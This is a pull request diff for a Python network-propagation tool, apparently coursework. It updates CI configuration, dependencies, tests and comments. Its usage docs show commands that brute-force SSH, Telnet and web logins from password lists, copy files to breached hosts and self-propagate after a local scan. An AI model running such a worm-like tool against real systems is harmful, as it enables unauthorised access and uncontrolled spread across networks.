Merge pull request #25 from andrewk10/14-finish-test_net_propagationp…

…y-and-add-proper-logging

Tests for Net Propagation Functions, More work with strings and two security issues patched... Phew...

.circleci/config.yml

@@ -41,7 +41,7 @@ jobs:
 # Invoke jobs via workflows
 # See: https://circleci.com/docs/2.0/configuration-reference/#workflows
 workflows:
-  sample: # This is the name of the workflow, feel free to change it to better match your workflow.
+  autocompliance-workflow:
     # Inside the workflow, you define the jobs you want to run.
     jobs:
       - build-and-test

.github/workflows/codeql-analysis-feature.yml

@@ -13,10 +13,10 @@ name: "CodeQL - Feature"
 
 on:
   push:
-    branches: [ 17_adding_strings ]
+    branches: [ 14-finish-test_net_propagationpy-and-add-proper-logging ]
   pull_request:
     # The branches below must be a subset of the branches above
-    branches: [ 17_adding_strings ]
+    branches: [ 14-finish-test_net_propagationpy-and-add-proper-logging ]
   schedule:
     - cron: '34 22 * * 4'
 

.github/workflows/python-app-feature.yml

@@ -5,9 +5,9 @@ name: Python Application - Feature
 
 on:
   push:
-    branches: [ 17_adding_strings ]
+    branches: [ 14-finish-test_net_propagationpy-and-add-proper-logging ]
   pull_request:
-    branches: [ 17_adding_strings ]
+    branches: [ 14-finish-test_net_propagationpy-and-add-proper-logging ]
 
 jobs:
   build:

dev_setup.sh

@@ -1,4 +1,3 @@
 #!/usr/bin/env bash
 # Linux setup for running the scripts locally.
-python3 -m pip install ipykernel paramiko scapy pytest requests
-/usr/bin/python3 -m pip install --upgrade pip
+python3 -m pip install --upgrade pip ipykernel paramiko scapy pytest requests coverage

docs/wiki/usage/index.md

@@ -24,8 +24,15 @@ The script will take in the following parameters:
 
 Example usage would look like this:
 ```
-./net_attack.py -t my_ip_list.txt -p 22,23,25,80 -u admin -f my_password_list.txt
-./net_attack.py -t ip_list.txt -p 22 -u root -f passwords.txt
-./net_attack.py -t ip_list.txt -p 22 -u root -f passwords.txt -d test.txt
-./net_attack.py -L -p 22,23 -u root -f passwords.txt -P
+# Running the propagation script across numerous services (SSH, Telnet, Web)
+./main.py -t src/test_files/ip_list.txt -p 22,23,25,80 -u admin -f src/test_files/passwords_list.txt
+
+# Running the propagation script just across SSH
+./main.py -t src/test_files/ip_list.txt -p 22 -u root -f src/test_files/passwords_list.txt
+
+# Running the propagation script just across SSH and spreading a specific file.
+./main.py -t src/test_files/ip_list.txt -p 22 -u root -f src/test_files/passwords_list.txt -d src/test_files/file.txt
+
+# Running the propagation script across SSH and Telnet but acquiring IPs through a local scan and then subsequently self propagating.
+./main.py -L -p 22,23 -u root -f src/test_files/passwords_list.txt -P
 ```

requirements.txt

@@ -1,7 +1,7 @@
-scapy>=2.4.5
+scapy
 ipykernel
 paramiko
-scapy>=2.4.5
 pytest
-requests>=2.27.0
+requests
 coverage
+pyinstaller

run_tests.sh

@@ -0,0 +1,6 @@
+#!/usr/bin/env bash
+# Linux setup for running the scripts locally.
+# See; https://coverage.readthedocs.io/en/6.3.2/
+coverage run -m pytest
+coverage report
+coverage html

src/main.py

@@ -1,21 +1,14 @@
 #!/usr/bin/python3
+
+# Importing logging to safely log sensitive, error or debug info.
 import logging
+# Importing net_propagation for propagating across the network.
 import net_propagation
+# Importing strings for use of the external strings resources.
 import strings
+# Importing sys to make OS calls and use OS level utilities.
 import sys
 
-"""
- - Importing logging to safely log sensitive, error or debug info.
- - Importing net_propagation for propagating across the network.
- - Importing strings for use of the external strings resources.
- - Importing sys to make OS calls and use OS level utilities.
-"""
-
-"""
-===PLEASE READ===
-This main function itself has more  specific, low level commenting.
-"""
-
 
 def main():
     """
@@ -33,8 +26,18 @@ def main():
     transfer_file_filename = strings.BLANK_STRING
 
     # Validating and assigning values based on arguments passed in.
-    ip_list, target_ports, target_username, passwords_filename = \
-        net_propagation.checking_arguments(arguments)
+    valid_values = net_propagation.checking_arguments(arguments)
+    # If they are valid values...
+    if valid_values is None:
+        # Show the user instructions and exit gracefully.
+        net_propagation.exit_and_show_instructions()
+        sys.exit(-1)
+
+    # Else...
+    else:
+        # Assign them...
+        ip_list, target_ports, target_username, passwords_filename = \
+            valid_values
 
     # The end user specified a local scan must be executed, the result of the
     # local scan will extend the current ip_list.
@@ -72,8 +75,7 @@ def main():
             sys.exit(-1)
     # Removing duplicate entries in the IP address list, can come from
     # combining local scan with given IP addresses in an ip address file for
-    # example.
-    # TODO: Find a way to fix the duplicates issue, instead of this workaround.
+    # example. This would be a user error, we're just handling that.
     ip_list = list(dict.fromkeys(ip_list))
     # Removing IPs from the IP list that can't be pinged from the host machine
     # of the script.